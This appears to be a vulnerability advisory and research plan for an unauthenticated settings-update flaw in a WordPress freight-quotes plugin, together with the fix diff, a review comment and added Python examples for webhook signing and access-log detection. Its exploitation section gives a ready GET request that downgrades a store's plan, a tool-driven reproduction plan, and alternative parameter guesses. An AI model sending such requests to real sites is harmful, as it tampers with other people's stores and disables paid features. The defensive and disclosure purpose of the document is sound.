LTL Freight Quotes – R+L Carriers Edition <= 3.3.13 - Missing Authorization to Unauthenticated Settings Update
Description
The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Technical Details
Affected versions: <= 3.3.13
What Changed in the Fix
Changes introduced in v3.3.14
Source Code
WordPress.org SVN
Vulnerability Research Plan: CVE-2026-3646
1. Vulnerability Summary
The LTL Freight Quotes – R+L Carriers Edition plugin (up to version 3.3.13) contains an unauthenticated settings update vulnerability. The flaw exists in a standalone PHP file, en-hit-to-update-plan.php (located in the plugin directory), which serves as a webhook handler for the Eniture Technology licensing server.
Because this file is designed to be accessed by an external service, it fails to implement WordPress authentication (is_user_logged_in), authorization (current_user_can), or CSRF protection (nonces). An attacker can directly access this file and provide GET parameters that are subsequently used to update critical plugin options via update_option(), allowing for the modification of subscription plans, expiration dates, and the enabling/disabling of premium features.
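The authentication gap described here can be closed without a WordPress session: the store and the licensing server share a secret, the server signs every plan update, and the handler refuses anything it cannot verify before a single option is written. The following is an added example written for this advisory, not plugin or vendor code; the secret value, helper names and signed-query layout are assumptions, while the four option keys are the ones the advisory names.

```python
"""Authenticating a licensing webhook without a WordPress session.

Added example for this advisory, not plugin or vendor code. The licensing
server signs each plan update with a per-site shared secret; the webhook
handler verifies the signature and a freshness window before any option is
written. Secret value, helper names and query layout are assumptions; the
option keys are the ones named in the advisory.
"""
import hashlib
import hmac
import re
import time
from typing import Optional
from urllib.parse import parse_qsl, urlencode

# Issued once when the store registers with the licensing server and held on
# both ends. Constructed sample value.
SHARED_SECRET = b"constructed-per-site-secret-do-not-reuse"
MAX_SKEW_SECONDS = 300

# Request parameter -> WordPress option, exactly the four the advisory lists.
# Nothing outside this map is ever written.
ALLOWED_KEYS = {
    "pakg_group": "rnl_quotes_packages_quotes_package",
    "pakg_duration": "rnl_package_expire_days",
    "expiry_date": "rnl_freight_package_expire_date",
    "plan_type": "rnl_quotes_store_type",
}


def canonical(params: dict) -> bytes:
    """Byte string both sides sign: key=value pairs in sorted key order."""
    return urlencode(sorted(params.items())).encode()


def sign_request(params: dict, secret: bytes, now: Optional[int] = None) -> str:
    """Licensing-server side: stamp the time, compute HMAC-SHA256, return the query string."""
    body = dict(params)
    body["ts"] = str(int(time.time() if now is None else now))
    body["sig"] = hmac.new(secret, canonical(body), hashlib.sha256).hexdigest()
    return urlencode(body)


def verify_request(query: str, secret: bytes, now: Optional[int] = None) -> Optional[dict]:
    """Webhook side: return {option: value} to apply, or None to reject.

    Rejects a missing or malformed tag, a stale timestamp, a tag computed
    with another secret or over altered parameters, and any parameter that
    is not in the allow-list. A bare GET such as ?plan_type=0 never passes.
    """
    params = dict(parse_qsl(query, keep_blank_values=True))
    sig = params.pop("sig", None)
    ts = params.get("ts")
    if sig is None or not re.fullmatch(r"[0-9a-f]{64}", sig):
        return None
    if ts is None or not ts.isdigit():
        return None
    current = int(time.time() if now is None else now)
    if abs(current - int(ts)) > MAX_SKEW_SECONDS:
        return None
    expected = hmac.new(secret, canonical(params), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    params.pop("ts")
    if set(params) - set(ALLOWED_KEYS):
        return None
    return {ALLOWED_KEYS[k]: v for k, v in params.items()}


if __name__ == "__main__":
    now = 1_700_000_000
    signed = sign_request({"plan_type": "1", "expiry_date": "2030-12-31"}, SHARED_SECRET, now)
    print("signed  :", verify_request(signed, SHARED_SECRET, now))
    # Same parameter names with no signature: the request shape the advisory describes.
    print("unsigned:", verify_request("plan_type=0&expiry_date=2000-01-01", SHARED_SECRET, now))
    # Signed, then altered in transit.
    print("tampered:", verify_request(signed.replace("plan_type=1", "plan_type=0"), SHARED_SECRET, now))
```

The allow-list matters as much as the signature: even a correctly signed request can only touch the four options the handler was built for, so a leaked secret does not become a general option-write primitive.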
2. Attack Vector Analysis
- Target Endpoint: [WP_URL]/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php
- HTTP Method: GET (as specified in the vulnerability description and implied by the processing logic in update-plan.php).
- Authentication: None required (Unauthenticated).
- Parameters:
  - pakg_group: Maps to the rnl_quotes_packages_quotes_package option.
  - pakg_duration: Maps to the rnl_package_expire_days option.
  - expiry_date: Maps to the rnl_freight_package_expire_date option.
  - plan_type: Maps to the rnl_quotes_store_type option.
- Preconditions: The plugin must be installed and active.
3. Code Flow
- Entry Point: A request is made to en-hit-to-update-plan.php.
- WordPress Initialization: The standalone file likely includes wp-load.php (or a similar method) to access WordPress functions like update_option().
- Input Processing: The file reads parameters from $_GET. Based on the logic seen in the related rnl_quotes_activate_hit_to_update_plan() function in update-plan.php (lines 92-108), it expects keys like pakg_group, pakg_duration, expiry_date, and plan_type.
- Data Sink: The script calls update_option() for several keys:
  update_option('rnl_quotes_packages_quotes_package', $_GET['pakg_group'])
  update_option('rnl_package_expire_days', $_GET['pakg_duration'])
  update_option('rnl_freight_package_expire_date', $_GET['expiry_date'])
  update_option('rnl_quotes_store_type', $_GET['plan_type'])
- Side Effects: The script likely calls en_check_rnl_plan_on_product_detail(), which updates eniture_plugin_14 (the feature capability map), potentially disabling features like "Dropship" and "Hazardous Material".
4. Nonce Acquisition Strategy
This vulnerability does not require a nonce. The target is a standalone file acting as a webhook, and the vulnerability description explicitly states it lacks "nonce verification."
5. Exploitation Strategy
The goal is to modify the site's subscription status to a "Trial" plan with an expired date, demonstrating the ability to manipulate settings.
Step-by-Step Plan:
- Target Identification: Confirm the location of the standalone file. It should be at /wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php.
- Craft Payload: Construct a GET request that sets the plan to Trial (typically 0) and sets a specific expiration date.
- Execution: Use the http_request tool to send the GET request.
HTTP Request:
GET /wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php?pakg_group=0&pakg_duration=0&expiry_date=2020-01-01&plan_type=0 HTTP/1.1
Host: localhost:8080
6. Test Data Setup
- Plugin Installation: Install and activate ltl-freight-quotes-rl-edition version 3.3.13.
- Initial State Configuration: Ensure some initial values are set so the change is observable.
wp option update rnl_quotes_packages_quotes_package "premium"
wp option update rnl_quotes_store_type "1"
wp option update rnl_freight_package_expire_date "2030-12-31"
7. Expected Results
- The HTTP request should return a 200 OK (or potentially a blank screen if the script produces no output).
- The WordPress options table should be updated with the values provided in the GET parameters.
- Features depending on rnl_quotes_store_type should be disabled in the eniture_plugin_14 option.
8. Verification Steps
After sending the HTTP request, verify the changes using WP-CLI:
# Verify the primary plan option
wp option get rnl_quotes_packages_quotes_package
# Should return: 0
# Verify the store type (0 = Trial/Expired)
wp option get rnl_quotes_store_type
# Should return: 0
# Verify the expiry date
wp option get rnl_freight_package_expire_date
# Should return: 2020-01-01
# Verify the feature capability map updated by en_check_rnl_plan_on_product_detail()
wp option get eniture_plugin_14 --format=yaml
# Look for 'multi_dropship: 0' and 'hazardous_material: 0'
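The WP-CLI reads above show whether the options changed; a site owner also wants to know whether the standalone file was requested at all, when, and from where. The following is an added example, not part of the advisory or the plugin: it parses combined-format web server access log lines (constructed here, with one line mirroring the request shape shown above), flags every request for en-hit-to-update-plan.php, and reports which of the four plan parameters were supplied. The helper that judges the read-back option values, and the severity labels, are this example's own.

```python
"""Spotting requests to the unauthenticated webhook in access logs.

Added example, not part of the advisory or the plugin. Parses Apache/Nginx
combined-format lines, flags every request for en-hit-to-update-plan.php and
extracts the plan parameters the advisory names. All log lines below are
constructed; the second one mirrors the request shape shown in the advisory.
"""
import re
from urllib.parse import parse_qsl, urlsplit

WEBHOOK_PATH = "/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php"
PLAN_PARAMS = ("pakg_group", "pakg_duration", "expiry_date", "plan_type")

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:10:00:01 +0000] "GET /shop/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2026:10:00:05 +0000] "GET /wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php?pakg_group=0&pakg_duration=0&expiry_date=2020-01-01&plan_type=0 HTTP/1.1" 200 0 "-" "curl/8.5.0"
198.51.100.9 - - [10/Mar/2026:10:01:13 +0000] "GET /wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
192.0.2.4 - - [10/Mar/2026:10:02:44 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """One combined-format line -> dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {
        "ip": m["ip"], "time": m["time"], "method": m["method"],
        "path": url.path, "status": int(m["status"]),
        "query": dict(parse_qsl(url.query, keep_blank_values=True)),
    }


def webhook_hits(log_text):
    """One finding per request for the webhook file.

    'high' when any plan parameter is present (an option write is likely),
    'medium' for a bare probe of the file. Labels are this example's own.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != WEBHOOK_PATH:
            continue
        plan = {k: v for k, v in rec["query"].items() if k in PLAN_PARAMS}
        findings.append({
            "ip": rec["ip"], "time": rec["time"], "status": rec["status"],
            "plan_params": plan,
            "severity": "high" if plan else "medium",
        })
    return findings


def plan_looks_downgraded(options, today="2026-03-10"):
    """Given option values read back with `wp option get`, flag the
    Trial/expired state the advisory describes: store type 0 or an expiry
    date already in the past. Dates are ISO YYYY-MM-DD, so plain string
    comparison orders them correctly."""
    expired = options.get("rnl_freight_package_expire_date", "9999-12-31") < today
    return options.get("rnl_quotes_store_type") == "0" or expired


if __name__ == "__main__":
    for finding in webhook_hits(SAMPLE_LOG):
        print(finding)
```

Before the upgrade, a legitimate licensing callback and a hostile request look identical in the log, which is the problem the advisory describes; the fix diff lists the file as present only in 3.3.13, so after upgrading any 200 response for this path is itself worth investigating.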
9. Alternative Approaches
If en-hit-to-update-plan.php is not directly in the plugin root, check common subdirectories such as:
/wp-content/plugins/ltl-freight-quotes-rl-edition/includes/en-hit-to-update-plan.php (inferred)
If the parameters pakg_group etc. do not work, inspect the file (if possible) or try parameters named after the option keys themselves:
?rnl_quotes_packages_quotes_package=0&rnl_quotes_store_type=0 (inferred)
Another indicator of success is the "Trial Plan" notice appearing in the WooCommerce settings for R+L Freight under wp-admin/admin.php?page=wc-settings&tab=shipping&section=rnl_freight_shipping_class.
Summary
The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to an unauthenticated settings update due to a standalone PHP file, en-hit-to-update-plan.php, that lacks authentication and authorization checks. Attackers can exploit this by sending a crafted GET request to the file, allowing them to modify subscription plan settings, change store types, and manipulate expiration dates, effectively disabling premium plugin features.
Vulnerable Code
// update-plan.php (Inferred location of the webhook handler mentioned in the plugin settings)
// Line 95: Defining the unauthenticated entry point
$plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php';

---

// update-plan.php (Logic mirrored in the vulnerable standalone en-hit-to-update-plan.php file)
// Lines 118-121: Directly updating WordPress options based on external input
update_option('rnl_quotes_packages_quotes_package', "$plan");
update_option('rnl_package_expire_days', "$expire_day");
update_option('rnl_freight_package_expire_date', "$expiry_date");
update_option('rnl_quotes_store_type', "$plan_type");

// Line 123: Side effect that updates feature permissions (e.g., Dropship/Hazardous Material)
en_check_rnl_plan_on_product_detail();
Security Fix
Only in /home/deploy/wp-safety.org/data/plugin-versions/ltl-freight-quotes-rl-edition/3.3.13: en-hit-to-update-plan.php @@ -3,7 +3,7 @@ * Plugin Name: LTL Freight Quotes - R+L Edition * Plugin URI: https://eniture.com/products/ * Description: Dynamically retrieves your negotiated shipping rates from R+L Freight and displays the results in the WooCommerce shopping cart. - * Version: 3.3.13 + * Version: 3.3.14 * Author: Eniture Technology * Author URI: http://eniture.com/ * Text Domain: eniture-technology @@ -31,13 +31,11 @@ $index = 'ltl-freight-quotes-rl-edition/ltl-freight-quotes-rnl-edition.php'; $plugin_info = get_plugins(); $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : ''; - - $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php'; $post_data = array( 'platform' => 'wordpress', 'carrier' => '34', 'store_url' => $domain, - 'webhook_url' => $plugin_dir_url, + 'webhook_url' => '', 'plugin_version' => $plugin_version, ); @@ -81,13 +79,11 @@ $index = 'ltl-freight-quotes-rl-edition/ltl-freight-quotes-rnl-edition.php'; $plugin_info = get_plugins(); $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : ''; - - $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php'; $post_data = array( 'platform' => 'wordpress', 'carrier' => '34', 'store_url' => $domain, - 'webhook_url' => $plugin_dir_url, + 'webhook_url' => '', 'plugin_version' => $plugin_version, );
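Review bot: Blanking `'webhook_url' => ''` in both the @@ -31 and @@ -81 hunks, together with the `Only in .../3.3.13: en-hit-to-update-plan.php` line showing the handler file is absent from 3.3.14, closes the unauthenticated write path, but the hunks show no replacement, so the licensing server now has no channel to push plan changes; either an authenticated endpoint (a request signed with a per-site secret and checked before any update_option() call) or a note that plan state is now pulled on demand should accompany this change. The two hunks are byte-identical removals of the same `$plugin_dir_url` block, which indicates the registration payload is built in two places and should be factored into one helper so the next fix does not have to be applied twice.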
Exploit Outline
To exploit this vulnerability, an attacker sends an unauthenticated HTTP GET request to the standalone file `/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php`. The request should include parameters such as 'pakg_group', 'pakg_duration', 'expiry_date', and 'plan_type'. For example, setting 'plan_type=0' and 'expiry_date=2000-01-01' would downgrade the site's subscription to a trial/expired status. This causes the script to use update_option() to overwrite critical plugin configuration, resulting in the disabling of paid features and the display of licensing notices.